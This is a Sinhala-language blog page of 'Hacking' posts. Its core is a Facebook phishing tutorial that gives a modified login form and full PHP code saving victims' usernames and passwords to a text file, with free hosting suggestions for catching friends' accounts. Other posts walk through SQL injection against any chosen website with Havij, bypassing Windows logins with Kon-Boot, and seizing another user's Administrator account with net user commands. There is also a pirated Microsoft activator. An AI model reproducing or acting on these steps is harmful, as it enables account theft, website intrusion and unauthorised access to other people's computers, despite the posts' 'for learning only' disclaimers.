WHAT'S NEW?
Loading...
Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts
Type here writers



වින්ඩෝස් පාස්වර්ඩ් එක අමතක වුණොත් මොකද කරන්නේ

1. මෙතන ක්ලික් කරලා Download කරන්න.

මේක සල්ලි දීලා ගත්තොත් $ 15ක්,
KON-BOOT
ඊටපස්සේ පෙන් එක අරගෙන ෆෝමැට් කරලා දාන්න.
දැන් මෙන්න මේ විදිහට ටොරන්ට් එකේ තියෙන සොෆ්ට්වෙයා එක අරගෙන පෙන් එක තෝරලා දෙන්න.




දැන් පෙන් එක ගලවලා රිංගන ඕන කරන මැසිමට ගහන්න.


දැන් ඉතින් ඒක යනකම් ඉන්න. ඊටපස්සේ වින්ඩෝස් ලෝගෝ එක එන්න ටික වෙලාවක් යාවි. ඊටපස්සේ පාස්වර්ඩ් එක ටයිප් කරන තැනට ආවම එක්කෝ එතන මොනවත් නොගහා එන්ටර් එක ඔබන්න. නැත්නම් ඔයා කැමති පාස්වර්ඩ් එකක් ගහන්න. දැන් ඉතින් වැඩේ හරි. 


Video එකෙන් බලාගන්න


අපිට Like එකක් දාන්න අමතක කරන්න එපා.


Best way to hack FACEBOOK 100% Sure

ඉතින් මම  මුලින්ම කියන්න කැමති මේක මම ඔයාලට කියන්නේ ඉගෙනුම පිනිස පමණක් බව.එක නිසා මේක නරකට යොදාගන්න එපා. එකත් මතක තියාගෙන වැඩේට බහිමු එහෙනම්. වැඩේට බහිමු කියුවට අද බහින්න දෙයක් නෑ. බලාගන්න පුලුවන් වෙන්න විඩියෝ එකක්ම මම දැම්මා. ඔයාලාත් ඒ විදිහටම කරන්න.
video l youtube - 


Download code from here : http://www72.zippyshare.com/v/78471943/file.html
www.smartworldsl.com
Navidu shihan jayasinghe


2014 New
Microsoft Product ඔක්කම Active කරන්න පුලුවන්  Activator එකක් අරගෙනයි මන් අද අවෙ. මේකෙන් Windows 7, Windows 8, Windows 8.1 හෙවත් Windows blue වගේම Microsoft Office 10 හා Microsoft Office 13 සාර්ථකව Active කරන්න පුලුවන්. ගොඩක් වටියි කියල හිතනව. 

අපිට Like එකක් දාන්න අමතක කරන්න එපා.
 http://www.everythingcellphone.org/wp-content/uploads/2013/07/how-to-avoid-getting-hacked.jpg
මගේ පළමු ලිපිය අරන් ආවා ඔයාලට, මම මේ බ්ලොග් අඩවියට අලුත් උනත් බ්ලොග් වලට අලුත් නැහැ..අද අරන් අවේ ඔයාලව දවසකටවත් හැකර් කෙනෙක් කරන ක්‍රමයක් හොයාගෙන.. Hacker කෙනෙක් කිවුව ගමන් ඔයාලට මතක් වෙන්නේ facebook නේද! එත් අද කියන්න යන්නේ ඉට වඩා පොඩි ආතල් එකක් ගන්න පුළුවන් දෙයක් ගැන https://m-static.ak.fbcdn.net/rsrc.php/v2/yH/r/SOe5wIZyutW.png 
මම කියන්න යන්නේ පොඩි වෙබ් කට්ටක් ගැන. එත් මේකෙන් ගන්න පුළුවන් ආශ්වාදයනම් මරේ මරු..
ඔන්න එහෙනම් මෙතනින් කෙලින්ම වෙබ් අඩවියට ගොඩ වෙන්න.
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieoO9P0jxCP8K9YpfFfwiElnQy8kGxwVYBIBTdm4bMgI0oqm5RwppybRv22OzM7Fw90A8H6yrDTTQkL-ZrGJjsm1obXmEzf883Hxw296DdCSRXFo3gltGnI5nBYYsoVursZh5RMdCFRRUC/s1600/go+to+site.jpg
මතක් කරලා Comment එකක් දාලාම යන්න , මේ වගේ ජෝලියට බර තව පොස්ට් එකකින් නැවත හමුවෙමු එහෙනම් මම ඔබේ ආදරණිය яecση

අපිට Like එකක් දාන්න අමතක කරන්න එපා.
http://hack-solutions.com/wp-content/uploads/2014/01/Facebook-logo-big-blue.jpg

මුලින්ම මන් කියන්න ඕනෙ මේක වැරදි වැඩ වලට භාවිතා කරන්න එපා. මේක phishing method එකක්. ඒ කියන්නෙ මේකට Hack වෙන කෙනාගෙ පොඩි අනුග්‍රහයක් ඕනෙ.

හරි හරි අපි වැඩේට බහිමු. මුලින්ම ඔයාල Facebook Log out වෙලා ඔයාල browser එකේ ඉදන්ම ctrl+U හෝ ctrl+V press කරන්න.නැත්තම් පහත ආකාරයට Right Click කරල View Page Source යන්න click කරන්න.


එතකොට ඔයාලට code view එකක් ලැබෙයි. ඒ code එක සම්පූර්ණයෙන්ම copy කරන් (ctrl+A >> ctrl+c) note pad එකකට past කරගන්න (ctrl+V) දැන් එකේ ctrl+F press කරල පහත ආකාරයේ code කැබැල්ලක් හොයා ගන්න.

action="https://www.facebook.com/login.php?login_attempt=1"

දැන් එහි උඩු කොමා වල තියන link එක මකා post.php කියල type කරන්න.මෙන්න මේ විදිහට...

action="post.php"

දැන් එම note pad එක save කරගන්න ඕනෙ නමුත් එහි නම index.htm විය යුතුයි. .htm කියා අනිවාර්යයෙන් තිබිය යුතුයි.

දැන් ඒක එහෙම්ම තියල තව note pad එකක් අරන් පහත් cede එක ඒකට past කරගන්න.

<?php
header ('Location:http://www.facebook.com/');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>



දැන් අපි මේ File එකත් save කරගන්න ඕනෙ. හැබැයි ඒක save කරන්න ඕනෙ post.php කියල. දැන් අපිට file 2ක් තියනව.


හොදයි ඊලග පියවර තමා අපි මේ file 2 Host කරගන්න ඕනෙ. අපිට මේකට Free hosting දෙන සේවයක් යොදා ගන්න පුලුවන්. මන් මේ පහතින් දාන ඒවයින් එකක ඔයාල account එකක් හදල මේ file 2 host කරන්න.එක මන් දැන් කියල දෙන්න යන් නෑ. ලේසි වැඩක්. බැරි උනොත් මගෙන් අහන්නකො.

www.000webhost.com/

www.5gbfree.com/ 

දැන් වැඩේ ගොඩ.  ඔයාලට හම්බෙන link එකට ගියාම facebook වගේම interface එකක් ලැබෙයි. ඉතින් hack කරන්නනම් ඔයාලගෙ යාලුවව මේ ලින්ක් එකෙන්  log කරවන්න ඕනෙ. ලොග්  උනාම ඔයාලට දකින්න පුලුවන් host කරපු තැන txt file එකක් එකේ ඇති ඔයාගෙ යාලුවාගෙ facebook username එකයි password එකයි.

මේ මගේ phishing site එක >>>>>> 

 

අපිට Like එකක් දාන්න අමතක කරන්න එපා.

රුසියානු හැකර් කණ්ඩායමක් විසින් බිලියන 1.2 ක පරිශීලක නාම (Username) මුරපද (Password) හා නොයෙකුත් දත්ත වාර්තා සොරාගෙන ඇතැයි වාර්තා වේ. 
මෙලෙස අනවසරයෙන් ඇතුල් වී සොරකම් කරන ලද දත්ත ලේඛණවලට මිලියන 500 ක විද්‍යුත් තැපැල් ලිපිනවල පරිශීලක නාම හා මුරපද   (email adress) , වෙබ්අඩවි 42000ක පරිශීලක නාම හා මුරපද  හා ලොව ප්‍රසිද්ධ ඇඩෝබ් (Adobe) ආයතනයට අයත් මිලියන 10 ක දත්ත ලේඛණ ද ඇතුලත් බව ආරක්ෂක පර්යේෂකයන් පෙන්වා දෙයි.
හොල්ඩ් සයිබර් ආරක්ෂක ආයතනයේ ප්‍රධාන ආකර්ෂක තොරතුරු නිලධාරී ඇලක්ස් හෝල්ඩන් පවසන්නේ මෙම හැකර් කණ්ඩායම ඇමරිකානු ආයතන පමණක් ඉලක්කකරගෙන නැති බවත් ඕනෑම රටක ඕනෑම වෙබ්අඩවියක් හෝ වටිනාකමින් වැඩි ඕනෑම දත්ත ගබඩාවන් මොවන්ගේ සොරකමට අසුවිය හැකි බවයි. 
මූලාශ්‍රය : dallasnews


අපිට Like එකක් දාන්න අමතක කරන්න එපා.
http://i.telegraph.co.uk/multimedia/archive/02454/templerun2_2454391b.jpg 

අද මන් ගෙනාවෙනම් සුපිරි වැඩක්. Android Device Use කරන කොයි කවුරුත් දන්නව ඇති Temple Run 2 Game එක ගැන. සුපිරි Game එකක්නේ මේක. ඉතින් ඔයාලට තියන අවුල තමා මේ game එක Play කරන්න Coins වගේම Gems ඕනෙ. මන් අද ඔයාල කියල දෙන්නෙ මේ වැඩි කරගන්න විදිහයි.

හොඳයි මුලින්ම Temple Run 2 නැති අය දා ගන්නකෝ.....
Cover art

හරි දැන් එහෙනම් කරන්න තියෙන්නෙ මේකයි. මුලින්ම මන් දෙන මේ File එක Download කරගන්නකෝ.
http://www.veryicon.com/icon/png/File%20Type/Senary/Misc%20file%20txt.png
Download Hack File
හරි දැන් ඔයාල කැමති file explorer එකක් මගින් පහත තියට path එකට යන්න.
/sdcard/Android/data/com.imangi.templerun2/files

ඊට පස්සෙ ඒ Folder එකේ තියන gamedata.txt කියන File එක Delete කරල අපි කලින් Download කරගත් File එක එතෙන්ට paste කරගන්න.

දැන් වැඩේ ගොඩ Game එක Run කරල බලල comment එකක් දාන්නකෝ.

අපිට Like එකක් දාන්න අමතක කරන්න එපා.
දැන් මම් මෙහෙම කියද්දි ඔයල හමොම බලනව  ඇති මොනව ගැනද  අද මම මෙ කතාකරන්න යන්නෙ කියල... අද මම් ඔයලට් කියල දෙන්න යන්නෙ කොහොමද වෙබ් අඩවියක් හැක් කරන්නෙ කියල.මෙක මම හැමදමත්  කියනව වගෙ මෙව ඔයලට කියල දෙන්නෙ ඉගෙනුම සඳහා පමනක් බව අමතක කරන්නත් එපා.එහෙනම් දැන් අපි වෙබ් අඩවියක් හැක් කරන ගෙම් එක පටන් ගමු.

මුලින්ම මෙම ක්‍රමයට වෙබ් අඩවියක් හැක් කරනව කියන්නෙ මොකක්ද කියල ඉන්නම්කො.ගොඩක් දුරට වෙබ් අඩවි වලට පිවිසිමෙදි අපට කිරිමට හැකියාවක් ඇත්තේ ඉතාමත් සිමිත වැඩ ප්‍රමානයක් පමනයි.මොකද අනෙකුත් සෑම වෙබ් අඩවියක් තුල ඉහල පැල්න්තියේ වැඩ සියල්ලම පාලනය කරන්නෙ වෙබ් අඩවිය upload කරපු පුද්ගලයා අදාල සමාගමයි.අපි දැන් මෙ කරන්න යන්නෙ එ කට්ටිය ගෙ වෙබ් අඩවිය තුල රහසිගත තොරතුරු ඩත්ත වැනි දෙ ඔවුන්ට හොරෙන් සොරාගැනිමයි.

මෙකට ඔයලට ඔනෙ වෙනව පොඩි tools  දෙකක්.

1-WebCruiserWVS
2-Havij v1.16

මෙ  tools  දෙක බාගන්න කාට හරි ඔනෙනම් ලිපියෙ පහල download link එක දාල තියන්ව.
දැන් එහෙනම් ගේම පටන්ගමු.මම මෙ වඩ් කරන්නෙ කොහොමද කියල screen shots පවිච්චි කරල කියල දෙන්නම්.

මුලින්ම් ඔයල කැමති ඔනෙම වෙබ් අඩවියක් තොරගන්න.එට පස්සෙ එ වෙබ් අඩවියේ link  එක copy කරගෙන පහත පියවරයන් අනුගමනය කරන්න.


දැන් එ වෙබ් අඩවියේ link  එක WebCruiserWVS tool එක URL කියන තැනට  paste කරන්න.


ඉට පස්සෙ උඩින් තියන scan site කියන බොත්තම ඔබන්න.එතකොට මෙන්න මෙ වගේ වෙබ් අඩවිය මෙම
tool එක මගින් READ කරයි.


හොදයි දැන් එහෙනම් scan වෙලා ඉවරවුනාට පස්සේ කැමති  URL එකක් තොර ගන්න මෙ විදිහට.


දැන් අපි ඉලගට බවිතා කරන්නෙ Havij v1.16 කියන tool එකයි.දැන ් ඔයල කලින් තොරගත්ත URL එක මෙන්න මෙ විදියට paste කරන්න.



දැන් process එක  start කරන්න .ටික වෙලවකට පස්සෙ මෙන්න මෙ වගෙ විස්තරයක් ඔයා හැක් කරපු
වෙබ් අඩවියේ විස්තර ටික පෙනෙයි.



දැන් එහෙනම් ඔයලට පුලුවන් මෙ Havij v1.16 කියන tool එකෙන් ඔනෙම තොරතුරක් ලබාගැනීමට...


සෑම දෙනාටම බොහොම ස්තුතියි කියන අතර තවත්  ගෙමකට සෙට් වෙමු .. :)
කරුනාකර කතෘ අයිතිය සුරකින්න.මම විපුල(MAXFLASH)


File extract password : http://itdanumabedagamu.blogspot.com/
අද මම කියල දෙන්න යන්නෙ කොහොමද වෙනකෙනෙක්ගෙ Computer එකේ  password එක User account එකක ඉඳන් Hack  කරන්නෙ කොහොමද කියල. මේක ඔයලා හිතන තරම් අමරු වැඩක් නෙවෙයි ඉතින්.එත් මතක තියගන්න මේ පාඩම් ටික මම ඔයලට කියල දෙන්නෙ ඉගෙනගනිම සඳහා බව.මොකද Hacking කියන්නෙ කලාව්ක් විතරයි.එක අනිත් අයට කරදරයක් වෙන්නැති වෙන්න යොදා ගන්න එක ඔයලගෙ වගකිමක් කියල අමතක කරන්නත් එපා.
දැන් එහෙනම් අපි බලමු කොහොමද වෙන කෙනෙක්ගෙ password එක  Hack කරන්නෙ කොහොමද කියල.
මුලින්ම ඔයාලගෙ  User account එකට වෙන්න. ඉට පස්සෙ cmd එක open කරගන්න.මේක open  කරගන්නේ මෙන්න මෙහෙමයි.

1- win key එකත් එක්ක r එක ඔබන්න.එතකොට මෙන්න මේ වගේ window එකක් පෙනෙයි.

2- දැන් ඒ window එකේ රුපේ තියන cmd විදිහට කියල කරන්න. ඉට පස්සේ OKබොත්තම ඔබන්න.දැන් ඔයලගෙ පරිගණකයේ cmd එක  open වෙලා ඇති.



3- හොදයි දැන් එහෙනම් cmd එකේ කියල cd..  දෙපාරක් කරන්න.එතකොට මෙන්න මේ විදිහට ඔයලගෙ cmd window එක තියෙන්න ඔනේ.



4- දැන් net user කියල කරන්න.එතකොට දැනට තියෙන ඔක්කොම Accounts විස්තර මෙන්න මෙ විදියට පෙන්නයි .



5- මම දැන් යන්නෙ මගේ පරිගණකයේ administrator එක hack කරන්න.මම මේ type කරන ටික දැන් ඔයල cmd  එකේ type කරන්න.
net user Administrator active:yes
net user Administrator *

දැන් ඔයලටමේ උඩින් කරල තියන එකකරානම් මෙනන් මෙ විදිහට අලුතෙන් password එකක් දෙන්න ඉල්ලයි.දැන් ඔයලට කැමති password එකක් දිල Enter key එක ඔබන්න.



5- හොදයි දැන් ඔයලා Account එක  hack කරල ඉවරයි.දැන් අපි කලින් open කරපු Account එක දැන් disable කරන්න ඔනේ.එකට පහතින් තියන command  එක යොදගන්න.

net user Administrator active:no
exit

හොදයි දැන් ඔයල  Accout  එක  hack කරල ඉවරයි. දැන් ඔයල දුන්න අලුත් password එකෙන් account  එකට log  වෙන්න පුලුවන්.
 


 
Facebook Hack කරන්න සිරා ක්‍රමයක් මේක. වැඩි විස්තර මේ link එකෙන් ගිහින්ම බලන්නකෝ. Hack කරන්න කලින් video එක බලල ඉන්න.